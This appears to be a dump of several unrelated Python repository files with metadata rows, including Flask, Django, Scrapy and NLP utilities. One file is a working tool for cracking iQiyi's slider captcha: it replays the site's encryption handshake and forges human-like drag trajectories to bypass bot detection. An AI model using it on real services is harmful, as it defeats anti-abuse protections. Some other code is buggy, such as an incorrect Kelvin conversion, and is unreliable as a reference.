cursor.execute(query)
data = cursor.fetchall()
encodedData = []
for row in data:
encodedrow = []
for item in row:
if(isinstance(item,unicode)):
encodedrow.append(item.encode("utf-8"))
else:
encodedrow.append(item)
encodedData.append(encodedrow)
studentTable="";
for row in encodedData:
studentTable=studentTable+"<tr>"
for cell in row:
studentTable=studentTable+"<td>"+str(cell)+"</td>"
studentTable=studentTable+"</tr>"
studentTable=studentTable+""
print(studentTable)
return jsonify(studentTable)
#to get department database similar to getQuery
@nlpsql.route('/showDepartmentDetails',methods=['POST'])
def showDepartmentDetails():
query="select * from department"
query = main.processQuery(query)
cursor = mysql.connect().cursor()
cursor.execute(query)
data = cursor.fetchall()
encodedData = []
for row in data:
encodedrow = []
for item in row:
if(isinstance(item,unicode)):
encodedrow.append(item.encode("utf-8"))
else:
encodedrow.append(item)
encodedData.append(encodedrow)
departmentTable="";
for row in encodedData:
departmentTable=departmentTable+"<tr>"
for cell in row:
departmentTable=departmentTable+"<td>"+str(cell)+"</td>"
departmentTable=departmentTable+"</tr>"
print(departmentTable)
return jsonify(departmentTable)
#main function which runs the flask app
if __name__ == '__main__':
nlpsql.run()
|
[
"rakshitha1209@gmail.com"
] |
rakshitha1209@gmail.com
|
7dc0470973a257ec8d054571e176cdb67ef27fce
|
2bd19f3859fa5ef5fd705062577c8a8d9819ad33
|
/tempcon.py
|
38042bdf282a55ef99358af99fa4256a6d76e5fc
|
[
"MIT"
] |
permissive
|
itsayushprajapati/temperatureconverter
|
349de48fae1b55f4d678163e909e738884c03871
|
1595f36bd126c190cd430ddf55306bba2628aec4
|
refs/heads/master
| 2022-11-10T09:14:14.858402
| 2020-06-22T09:28:46
| 2020-06-22T09:28:46
| 272,431,849
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,160
|
py
|
#TempratureConverter
class Conversion:
"""\'Conversion\' class for conversion of temperature units .\n Use help for more -> help(temprature) """
def __init__(self,cel=0, fahrenheit=0,kelvin=0):
self.cel=cel
self.fahrenheit=fahrenheit
self.kelvin=kelvin
def ctof(self):
"""Method to convert Celcuis to Fahrenheit"""
var=self.cel*9+160
fahrenheit=var/5
return f"Temprature in Fahrenheit -> {fahrenheit}°F"
def ctok(self):
"""Method to convert Celcius to Kelvin"""
kelvin=self.cel+274.15
return f"Temprature in Kelvin -> {kelvin}"
def ftoc(self):
"""Method to convert Fahrenheit to Celcius"""
var=(self.fahrenheit-32)/9
celcius=var*5
return f"Temprature in Celcius -> {celcius}°C"
def ktoc(self):
"""Method to convert Kelvin to Celcius -- Coming Soon"""
pass
@property
def info(self):
return f"Celcius -> {self.cel}° Fahrenheit -> {self.fahrenheit}° Kelvin -> {self.kelvin}°"
class Defination:
def __init__(self,status=False):
self.status=status
def getdef(self):
if self.status==True:
return f"Celcius - The Celsius scale, also known as the centigrade scale, is a temperature scale. As an SI derived unit, it is used worldwide. However, in the United States, the Bahamas, Belize, the Cayman Islands, and Liberia, Fahrenheit remains the preferred scale for everyday temperature measurement. The degree Celsius (symbol: °C) can refer to a specific temperature on the Celsius scale or a unit to indicate a difference between two temperatures or an uncertainty. -- Wiki\n\nFahrenheit - The Fahrenheit scale is a temperature scale based on one proposed in 1724 by physicist Daniel Gabriel Fahrenheit. It uses the degree Fahrenheit as the unit. Several accounts of how he originally defined his scale exist. -- Wiki \n\nKelvin - The kelvin is the base unit of temperature in the International System of Units (SI), having the unit symbol K. It is named after the Belfast-born, Glasgow University engineer and physicist William Thomson, 1st Baron Kelvin (1824–1907). -- Wiki"
else:
return "Turn Status to \'True\'"
|
[
"noreply@github.com"
] |
noreply@github.com
|
8a16091fafc3f2319884a057c8e434ab0e79a775
|
7759c0ad152fe9c369b074a24601e54806b0afa8
|
/backend/event/api/v1/viewsets.py
|
4cba77ae5ad9f884a97fa17647488092f6c46aa1
|
[] |
no_license
|
crowdbotics-apps/covidcheck-15163
|
be59f495e31b50948725fb332429751749f9b611
|
a2f80fc2541bbc069cf3ec6a7f4d740aa665c77b
|
refs/heads/master
| 2023-02-08T22:01:35.813215
| 2020-03-29T16:50:54
| 2020-03-29T16:50:54
| 250,877,575
| 0
| 0
| null | 2023-01-24T01:47:09
| 2020-03-28T19:33:39
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,066
|
py
|
from rest_framework import authentication
from event.models import (
Category,
Faq,
Favorites,
Location,
MySchedule,
Presenter,
Schedule,
Sponsor,
Vendor,
VendorDetail,
)
from .serializers import (
CategorySerializer,
FaqSerializer,
FavoritesSerializer,
LocationSerializer,
MyScheduleSerializer,
PresenterSerializer,
ScheduleSerializer,
SponsorSerializer,
VendorSerializer,
VendorDetailSerializer,
)
from rest_framework import viewsets
class MyScheduleViewSet(viewsets.ModelViewSet):
serializer_class = MyScheduleSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = MySchedule.objects.all()
class CategoryViewSet(viewsets.ModelViewSet):
serializer_class = CategorySerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Category.objects.all()
class LocationViewSet(viewsets.ModelViewSet):
serializer_class = LocationSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Location.objects.all()
class PresenterViewSet(viewsets.ModelViewSet):
serializer_class = PresenterSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Presenter.objects.all()
class VendorViewSet(viewsets.ModelViewSet):
serializer_class = VendorSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Vendor.objects.all()
class FaqViewSet(viewsets.ModelViewSet):
serializer_class = FaqSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Faq.objects.all()
class ScheduleViewSet(viewsets.ModelViewSet):
serializer_class = ScheduleSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Schedule.objects.all()
class SponsorViewSet(viewsets.ModelViewSet):
serializer_class = SponsorSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Sponsor.objects.all()
class VendorDetailViewSet(viewsets.ModelViewSet):
serializer_class = VendorDetailSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = VendorDetail.objects.all()
class FavoritesViewSet(viewsets.ModelViewSet):
serializer_class = FavoritesSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Favorites.objects.all()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
9b3e528238dee10f5bdee6ca543158322d95ff6a
|
a46d135ba8fd7bd40f0b7d7a96c72be446025719
|
/packages/python/plotly/plotly/validators/scattergl/_xsrc.py
|
2c107c6b510e42d803ee235a58aa1eabf4f21690
|
[
"MIT"
] |
permissive
|
hugovk/plotly.py
|
5e763fe96f225d964c4fcd1dea79dbefa50b4692
|
cfad7862594b35965c0e000813bd7805e8494a5b
|
refs/heads/master
| 2022-05-10T12:17:38.797994
| 2021-12-21T03:49:19
| 2021-12-21T03:49:19
| 234,146,634
| 0
| 0
|
MIT
| 2020-01-15T18:33:43
| 2020-01-15T18:33:41
| null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
import _plotly_utils.basevalidators
class XsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(self, plotly_name="xsrc", parent_name="scattergl", **kwargs):
super(XsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
)
|
[
"noreply@github.com"
] |
noreply@github.com
|
cf6f8f6d79e22e007355a72e0a66fc5164d27ac1
|
d3156e543582c201cb8ee76634736842232db6ff
|
/cwgmedaltally/middlewares.py
|
810dd12bfcc1a6d304782447440fefc9f5bd875d
|
[] |
no_license
|
Madhurmm/cwg_medal_tally
|
777b3b9c4abc7325e4b42cc9729b874de9f96e7d
|
a7915898252d715c19f011d31ebdecf1d7afc5f1
|
refs/heads/master
| 2020-03-11T03:05:52.651739
| 2018-04-18T14:18:48
| 2018-04-18T14:18:48
| 129,736,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,611
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class CwgmedaltallySpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class CwgmedaltallyDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
|
[
"madhurmm4u@gmail.com"
] |
madhurmm4u@gmail.com
|
959d35bd8673cfb03fa83975c5e4b466288fa86d
|
5825ee1ec0ba8c24ebe194beabf94bbb72ccaf99
|
/Building ontology/Merging_function.py
|
c443b86424da7eb0a06395e1f37a2c4ac5107c7d
|
[] |
no_license
|
uliana-sentsova/russian_SPARQL
|
fd272121429614d326d382ff49f679bb18b74b92
|
c593925ed311661dda3a5f3ebd3929707597fb50
|
refs/heads/master
| 2021-06-08T01:37:17.521784
| 2016-10-31T09:13:32
| 2016-10-31T09:13:32
| 56,520,739
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,067
|
py
|
result = []
filename = "MAIN_ONTO_rivers.txt"
with open("PARSED.txt", 'r', encoding="utf-8") as f:
for line in f:
line = line.split("\t")
line = [l.strip() for l in line]
result.append(line)
print(len(result))
dictionary = {}
checked = []
rest = []
for line in result:
try:
if line[1] not in checked:
checked.append(line[1])
dictionary[line[1]] = line[0]
else:
rest.append(line)
except IndexError as err:
print(err)
print(line)
print(len(dictionary))
print(len(rest))
for r in rest:
string = dictionary[r[1]]
string = string.split(",")
normalized = string[-1]
string = string[:-1]
string_2 = r[0].split(",")
string_2 = string_2[1:-1]
for word in string_2:
if word and word not in string:
string.append(word)
string.append(normalized)
dictionary[r[1]] = ",".join(string)
print(len(dictionary))
with open(filename, "w") as f:
for key in dictionary:
f.write(dictionary[key] + "\t" + key + "\n")
|
[
"uliana.sentsova@gmail.com"
] |
uliana.sentsova@gmail.com
|
ff3179806be417683f17da0629967ff753f5acd1
|
c06d18ac5b87b3b82fc486454c422b119d6c1ee9
|
/src/demo/NLPBook/chapter5/stanford.py
|
e7a74651d98ea5d99c3a6e7fc528c3f3e51716fd
|
[] |
no_license
|
tangermi/nlp
|
b3a4c9612e6049463bf12bc9abb7aff06a084ace
|
aa36b8b20e8c91807be73a252ff7799789514302
|
refs/heads/master
| 2022-12-09T12:33:15.009413
| 2020-04-03T04:03:24
| 2020-04-03T04:03:24
| 252,056,010
| 0
| 0
| null | 2022-12-08T07:26:55
| 2020-04-01T02:55:05
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,411
|
py
|
# -*- coding: utf-8 -*-
import sys
import os
# CoreNLP 3.6 jar包和中文模型包
# ejml-0.23.jar
# javax.json.jar
# jollyday.jar
# joda-time.jar
# jollyday.jar
# protobuf.jar
# slf4j-api.jar
# slf4j-simple.jar
# stanford-corenlp-3.6.0.jar
# xom.jar
class StanfordCoreNLP(object):
def __init__(self,jarpath):
self.root = jarpath
self.tempsrcpath = "tempsrc" # 输入临时文件路径
self.jarlist = ["ejml-0.23.jar","javax.json.jar","jollyday.jar","joda-time.jar","protobuf.jar","slf4j-api.jar","slf4j-simple.jar","stanford-corenlp-3.6.0.jar","xom.jar"]
self.jarpath = ""
self.buildjars()
def buildjars(self): # 根据root路径构建所有的jar包路径
for jar in self.jarlist:
self.jarpath += self.root+jar+";"
def savefile(self,path,sent):
fp = open(path,"wb")
fp.write(sent)
fp.close()
# 读取和删除临时文件
def delfile(self,path):
os.remove(path)
class StanfordPOSTagger(StanfordCoreNLP):
def __init__(self,jarpath,modelpath):
StanfordCoreNLP.__init__(self,jarpath)
self.modelpath = modelpath # 模型文件路径
self.classfier = "edu.stanford.nlp.tagger.maxent.MaxentTagger"
self.delimiter = "/"
self.__buildcmd()
def __buildcmd(self): # 构建命令行
self.cmdline = 'java -mx1g -cp "'+self.jarpath+'" '+self.classfier+' -model "'+self.modelpath+'" -tagSeparator '+self.delimiter
def tag(self,sent): #标注句子
self.savefile(self.tempsrcpath,sent)
tagtxt = os.popen(self.cmdline+" -textFile "+self.tempsrcpath,'r').read() # 执行命令行
self.delfile(self.tempsrcpath)
return tagtxt
def tagfile(self,inputpath,outpath):# 标注文件
self.savefile(self.tempsrcpath,sent)
os.system(self.cmdline+' -textFile '+inputpath+' > '+outpath )
self.delfile(self.tempsrcpath)
def __buildprop(self): #创建属性文件
self.propline = 'java -mx1g -cp "'+self.jarpath+'" '+self.classfier+' -genprops'
def genpropfile(self,propath): # 获取属性文件
self.__buildprop()
propfile = os.popen(self.propline,'r').read()
self.savefile(propath,propfile)
print "save properties to ",propath
def __buildtrain(self,propspath): # 创建模型文件
self.trainline = 'java -mx4g -cp "'+self.jarpath+'" '+self.classfier +' -props "'+propspath+'"'
def trainmodel(self,propspath): # 训练模型
self.__buildtrain(propspath)
os.system(self.trainline)
print "save model to model.tagger"
|
[
"n10057862@qut.edu.au"
] |
n10057862@qut.edu.au
|
9f55d5019101be32718fdd9099b71c2cf4b05c1f
|
a7c1022b272636bc09ddbc323597145630d2942a
|
/tests/test_application.py
|
107d0e5c2a825b34d6bb5bf58f8778e643267f13
|
[
"MIT"
] |
permissive
|
gomezjdaniel/sharify-api
|
24e8d44023809a13d52563aaa53c32d2d28c14c9
|
383baa5ae089d996c2d68da8b55e566dd0cfbbf9
|
refs/heads/master
| 2023-05-31T09:50:10.683842
| 2020-01-07T22:20:45
| 2020-01-07T22:20:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 699
|
py
|
from unittest.mock import MagicMock
from app.application import ApplicationFactory
TITLE = 'API'
DESCRIPTION = 'some description'
FACTORY = ApplicationFactory(TITLE, DESCRIPTION)
def create_router():
router = MagicMock()
router.register = MagicMock()
return router
def test_whenCreatingApp_thenTitleIsSet():
app = FACTORY.create(debug=True)
assert app.title == TITLE
def test_whenCreatingApp_thenDescriptionIsSet():
app = FACTORY.create(debug=True)
assert app.description == DESCRIPTION
def test_whenCreatingApp_thenRoutesAreRegistered():
router = create_router()
FACTORY.create(debug=True, router=router)
router.register.assert_called_once()
|
[
"alexandre.frigon.1@gmail.com"
] |
alexandre.frigon.1@gmail.com
|
a95aa94622a80a2031422a715e1dead888f865c7
|
ffcfe0dbee140e4ed15e49c8e7feaac020055f36
|
/Funny_Js_Crack/60-iqiyi/geetest.py
|
324fc575a179e9fab5c52eee648e5b093c777db3
|
[
"MIT"
] |
permissive
|
sumerzhang/Func_Js_Crack
|
d086195a3685fc4612bedeaf950e16c623384cf4
|
8cc8586107fecace4b71d0519cfbc760584171b1
|
refs/heads/master
| 2022-11-11T22:51:27.250686
| 2020-07-01T15:49:01
| 2020-07-01T15:49:01
| 276,882,145
| 22
| 12
|
MIT
| 2020-07-03T11:19:48
| 2020-07-03T11:19:47
| null |
UTF-8
|
Python
| false
| false
| 10,050
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2019/10/7 10:43
# @Author : Esbiya
# @Email : 18829040039@163.com
# @File : geetest.py
# @Software: PyCharm
import re
import json
import random
import time
import requests
from iqiyi.img_locate import get_distance
from iqiyi.process_trace import get_risk_data
from iqiyi import iqiyi_crypt
class IqiyiSliderCracker:
def __init__(self, dfp):
self.i = iqiyi_crypt.get_random_str(64)
self.r = iqiyi_crypt.get_random_str(32)
# 这个 dfp 参数是个环境参数, 很重要, 是绕过爱奇艺滑块的关键, 我们这里使用的是过期的 dfp 参数, 以便可以触发爱奇艺安全盾
self.dfp = dfp
self.session = requests.session()
self.session.headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'https://www.iqiyi.com',
'Referer': 'https://www.iqiyi.com/iframe/loginreg?ver=1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36'
}
def login(self, env_token=''):
"""
登录, 只有一个加密参数密码, 其他为定值
触发滑块, 测试用
:return:
"""
url = 'https://passport.iqiyi.com/apis/reglogin/login.action'
encrypt_pwd = iqiyi_crypt.encrypt_pwd('fheniudhqiu')
data = {
'email': iqiyi_crypt.get_random_phone(),
'fromSDK': '1',
'sdk_version': '1.0.0',
'passwd': encrypt_pwd,
'agenttype': '1',
'__NEW': '1',
'checkExist': '1',
'lang': '',
'ptid': '01010021010000000000',
'nr': '1',
'verifyPhone': '1',
'area_code': '86',
'dfp': self.dfp,
'env_token': env_token,
# 环境参数: 当前环境可能存在风险
'envinfo': 'eyJqbiI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS83NS4wLjM3NzAuODAgU2FmYXJpLzUzNy4zNiIsImNtIjoiemgtQ04iLCJndSI6MjQsInVmIjoxLCJqciI6WzEzNjYsNzY4XSwiZGkiOlsxMzY2LDcyOF0sInpwIjotNDgwLCJ1aCI6MSwic2giOjEsImhlIjoxLCJ6byI6MSwicnYiOiJ1bmtub3duIiwibngiOiJXaW4zMiIsIml3IjoidW5rbm93biIsInFtIjpbIkNocm9tZSBQREYgUGx1Z2luOjpQb3J0YWJsZSBEb2N1bWVudCBGb3JtYXQ6OmFwcGxpY2F0aW9uL3gtZ29vZ2xlLWNocm9tZS1wZGZ+cGRmIiwiQ2hyb21lIFBERiBWaWV3ZXI6Ojo6YXBwbGljYXRpb24vcGRmfnBkZiIsIk5hdGl2ZSBDbGllbnQ6Ojo6YXBwbGljYXRpb24veC1uYWNsfixhcHBsaWNhdGlvbi94LXBuYWNsfiJdLCJ3ciI6ImI3NzY2NGM3MTcwNzdhZmZmMzNhN2QyODM2ZTIzNzdjIiwid2ciOiJlZDI2NTg5MTM1MTJlNTA5MmZlMjE5NDAwOGQ3OWEwZSIsImZrIjpmYWxzZSwicmciOmZhbHNlLCJ4eSI6ZmFsc2UsImptIjpmYWxzZSwiYmEiOmZhbHNlLCJ0bSI6WzAsZmFsc2UsZmFsc2VdLCJhdSI6dHJ1ZSwibWkiOiI5YTZlZWMzMS0xODAxLWI5ZGEtMDU3My1jMTVmOGVhMjVlNDEiLCJjbCI6IlBDV0VCIiwic3YiOiIxLjAiLCJqZyI6IjhkYTZmNDY5NmQ4YmU1ODFkMDliNzE3MTkwNTIxMGI5IiwiZmgiOiI0OGZpem1rcnZkejJ3Y2Q2ZzhqMXNybjkiLCJpZm0iOlt0cnVlLDQ2MCw0MjAsImh0dHBzOi8vd3d3LmlxaXlpLmNvbS8iXSwiZXgiOiIiLCJkdiI6Im9mZiIsInB2Ijp0cnVlfQ=='
}
result = self.session.post(url, data=data).json()
if result['code'] == 'P00223':
print('出现滑块: {}'.format(result))
return result['data']['data']['token']
elif result['code'] == 'P00159':
print('未出现滑块: {}'.format(result))
return None
print('滑块验证通过: {}'.format(result))
return None
def _init_key(self):
"""
初始化密钥
:return:
"""
secure = iqiyi_crypt.generate_secure(self.i, self.r)
# print('secure: {}'.format(secure))
url = 'https://qcaptcha.iqiyi.com/api/outer/sbox/sbox_init_key'
data = {
'secure': secure,
'platform': 'web',
'lang': 'zh_cn',
'langVersion': '6',
'dfp': 'undefined',
'authcookie': 'undefined',
'nifc': 'false'
}
result = self.session.post(url, data=data).json()
if result['code'] == 'A00000':
print('初始化密钥成功! ')
# print('密钥初始化数据: {}'.format(result))
return {
'sid': result['data']['sid'],
'sr': result['data']['sr']
}
return None
def format_origin_data(self, token):
"""
构造滑块初始化加密字符串
:param token:
:return:
"""
return json.dumps({
't': int(time.time() * 1000),
'token': token,
'width': 290,
'height': 170,
'clientVersion': 1,
'dfp': self.dfp,
'extend': json.dumps({
"dfp": self.dfp,
"ptid": "01010021010000000000",
"agentType": 1,
"deviceId": "268f8fe0ab5234ce32705696d288397e",
"areaCode": "86"
}
)}).replace(' ', '')
def _init_slider(self, token, aes_key, hmac_key, sid):
"""
初始化滑块
:param token:
:param aes_key: AES 密钥
:param hmac_key hmac 密钥
:param sid: 密钥认证参数
:return:
"""
url = 'https://qcaptcha.iqiyi.com/api/outer/verifycenter/initpage'
origin_data = self.format_origin_data(token)
cryptsrc_data = iqiyi_crypt.crypt_srcdata(aes_key, hmac_key, origin_data)
encrypt_data = {
'cryptSrcData': cryptsrc_data,
'cryptVersion': 'web|20180418xkdewxe3dkxu9|' + sid,
'platform': 'web',
'nifc': 'false'
}
# print('提交表单: {}'.format(encrypt_data))
resp = self.session.post(url, data=encrypt_data)
# print('验证码初始化接口返回加密数据: {}'.format(resp.text))
decrypt_data = json.loads(iqiyi_crypt.aes_decrypt(aes_key, resp.text.split('|')[0])[:-4])
# print('AES 解密后数据: {}'.format(decrypt_data))
init_data = decrypt_data['data']['initData']
print('滑块初始化成功! ')
return init_data
def format_verify_data(self, token, distance, start_time, ypos):
"""
构造提交表单
:param token:
:param distance:
:param start_time:
:param ypos:
:return:
"""
risk_data = get_risk_data(distance, start_time, ypos)
time.sleep(random.uniform(0.5, 1.5))
return json.dumps({
"t": int(time.time() * 1000),
"token": token,
"staticVerifyValue": distance,
"riskData": json.dumps(risk_data),
"clientVersion": 1,
"platform": "web",
"dfp": self.dfp
}).replace(' ', '')
def _slider_verify(self, post_data, aes_key, hmac_key, sid):
"""
最终验证
:param post_data: 提交表单
:param aes_key: AES 密钥
:param hmac_key hmac 密钥
:param sid: 密钥认证参数, 服务器用来识别你加密的密钥, 从而解密你提交的表单
:return:
"""
url = 'https://qcaptcha.iqiyi.com/api/outer/verifycenter/verify'
data = {
'cryptSrcData': iqiyi_crypt.crypt_srcdata(aes_key, hmac_key, post_data),
'cryptVersion': 'web|20180418xkdewxe3dkxu9|' + sid,
'platform': 'web',
'noCryptToken': 'undefined',
'nifc': 'false'
}
resp = self.session.post(url, data=data)
print('接口返回的加密数据: {}'.format(resp.text))
result = json.loads(re.search('{(.*?)}', iqiyi_crypt.aes_decrypt(aes_key, resp.text.split('|')[0])).group(0))
print('AES 解密后的数据: {}'.format(result))
return result
def crack(self):
"""
整个破解流程
:return:
"""
# 登录触发滑块, 注意要使用未过期且可疑的 dfp 参数,
token = self.login()
if not token:
return {
'success': 0,
'message': '该 dfp 参数未存在风险或已过期, 请更换未过期并且可疑的 dfp 参数, 以便触发滑块验证! ',
'data': None
}
# 初始化密钥, 明文传输 i、加密传输 r 这两个参数给服务器, 服务器会返回给你一个 sr 和 sid
# 其中 i, r, sr 用来生成 AES 和 hMac 密钥, sid 用来给服务器识别你之后传输的加密数据是哪个密钥加密的, 方便服务器解密
key_data = self._init_key()
# 生成 AES 密钥
aes_key = iqiyi_crypt.generate_aeskey(self.i, self.r, key_data['sr'])
# 生成 hMac 哈希密钥
hmac_key = iqiyi_crypt.generate_hmackey(self.i, self.r, key_data['sr'])
# 用和服务器约定好的密钥进行 AES 对称加密, 初始化滑块
init_data = self._init_slider(token, aes_key, hmac_key, key_data['sid'])
# 模拟滑动轨迹
start_time = int(time.time() * 1000)
# 停顿0.1~0.5 s, 模拟人为反应
time.sleep(random.uniform(0.1, 0.5))
# js 还原乱序图片, 并用 cv2 的 matchTemplate 方法识别缺口距离
distance = get_distance(init_data)
# 构造滑动轨迹 post 表单
verify_data = self.format_verify_data(token, distance, start_time, init_data['iconYOffset'])
# 最终验证
result = self._slider_verify(verify_data, aes_key, hmac_key, key_data['sid'])
if result['code'] == "A00000":
return {
'success': 1,
'message': '校验通过! ',
'data': {
'env_token': result['data']
}
}
return {
'success': 0,
'message': result['msg'],
'data': None
}
if __name__ == '__main__':
x = IqiyiSliderCracker('a10de51d85507d4b159df56da0ae46409210a03221b652d1fc525cc67fb0f65917').crack()
print(x)
|
[
"184108270@qq.com"
] |
184108270@qq.com
|
a2d4de70557e3e4cd9b206a5a81a6002cbad1b7e
|
3572b2f24e6343869b186f86cfc0c1dbb64f8ed8
|
/scripts/gen_headers.py
|
7aa6e11e1d345cf7bf4598c2ef75e579ab1ad77c
|
[] |
no_license
|
alessandro-montanari/SONIC
|
818656254bf90be8fee29f03dc666d25a161933b
|
868bb1def7e71ec791f44aea4f5d7aef5a0b64a7
|
refs/heads/master
| 2022-11-02T11:45:29.664945
| 2020-06-12T09:45:16
| 2020-06-12T09:45:16
| 271,762,975
| 0
| 0
| null | 2020-06-12T09:42:46
| 2020-06-12T09:42:45
| null |
UTF-8
|
Python
| false
| false
| 5,786
|
py
|
import os
import pickle
import argparse
import numpy as np
import scipy
import int_test
param_dir = None
header_dir = None
f_lit = lambda x: 'F_LIT(' + str(x) + ')'
def write_header(name, mats):
contents = '#ifndef ' + name.upper() + '_H\n'
contents += '#define ' + name.upper() + '_H\n'
contents += '#include \'<libfixed/fixed.h>\'\n'
contents += '#include \'<libdnn/mem.h>\'\n\n'
for mat_name, mat, layer, sparse in mats:
if layer == 'CONV' and sparse:
mat_str = ''
offsets_str = ''
sizes_str = ''
size = 0
mat = mat.reshape(mat.shape[0], -1)
for m in mat:
data = m[m != 0.0].astype(dtype=str)
idx = np.where(m != 0.0)[0]
offsets = np.diff(idx).flatten()
if data.shape[0] > 0:
data_size = data.flatten().shape[0]
str_mat = str(map(f_lit, data.flatten().tolist()))
mat_str += str_mat.replace('[', '').replace(']', '') + ','
str_offsets = str([idx[0]] + offsets.flatten().tolist())
offsets_str += str_offsets.replace('[', '').replace(']', '') + ','
sizes_str += str(data_size) + ','
size += data_size
else:
sizes_str += '0,'
mat_str = mat_str[:-1]
offsets_str = offsets_str[:-1]
sizes_str = sizes_str[:-1]
layers = mat.shape[0]
contents += '#define ' + mat_name.upper() + '_LEN ' + str(size) + '\n\n'
contents += '__ro_hifram fixed ' + mat_name + \
'[' + str(size) + '] = {' + mat_str + '};\n\n'
contents += '__ro_hifram fixed ' + mat_name + '_offsets[' + \
str(size) + '] = {' + offsets_str + '};\n\n'
contents += '__ro_hifram fixed ' + mat_name + '_sizes[' + \
str(layers) + '] = {' + sizes_str + '};\n\n'
elif layer == 'FC' and sparse:
csr = scipy.sparse.csr_matrix(mat)
data, indices, indptr = csr.data, csr.indices, csr.indptr
mat_str = str(map(f_lit, data.flatten().tolist()))
mat_str = mat_str.replace('[', '{').replace(']', '}')
indices_str = str(indices.flatten().tolist())
indices_str = indices_str.replace('[', '{').replace(']', '}')
indptr_str = str(indptr.flatten().tolist())
indptr_str = indptr_str.replace('[', '{').replace(']', '}')
contents += '#define ' + mat_name.upper() + '_LEN ' + \
str(len(data)) + '\n\n'
contents += '__ro_hifram fixed ' + mat_name + '[' + \
str(len(data)) + '] = ' + mat_str + ';\n\n'
contents += '__ro_hifram uint16_t ' + mat_name + '_offsets[' + \
str(len(indices)) + '] = ' + indices_str + ';\n\n'
contents += '__ro_hifram uint16_t ' + mat_name + '_sizes[' + \
str(len(indptr)) + '] = ' + indptr_str + ';\n\n'
else:
mat_str = str(map(f_lit, mat.flatten().tolist()))
mat_str = mat_str.replace('[', '{').replace(']', '}')
shape_str = ''
for s in mat.shape:
shape_str += '[' + str(s) + ']'
contents += '__ro_hifram fixed ' + mat_name + \
shape_str + ' = ' + mat_str + ';\n\n'
contents = contents.replace("'", '')
contents += '#endif'
path = os.path.join(header_dir, name + '.h')
with open(path, 'w+') as f:
f.write(contents)
def weight(name):
global param_dir
path = os.path.join(param_dir, name + '.param')
with open(path, 'r') as f:
return pickle.load(f)
def main(args):
global header_dir, param_dir
header_dir = args.header_dir
param_dir = args.param_dir
graph = int_test.Graph()
graph.append('input', weight)
graph.append('input_reshape', int_test.input_reshape, 'input')
graph.append('conv1_wd', weight)
graph.append('conv1_md', weight)
graph.append('conv1_wh', weight)
graph.append('conv1_mh', weight)
graph.append('conv1_wv', weight)
graph.append('conv1_mv', weight)
graph.append('conv1_b', weight)
graph.append('conv1_wmd_', int_test.mul, 'conv1_wd', 'conv1_md')
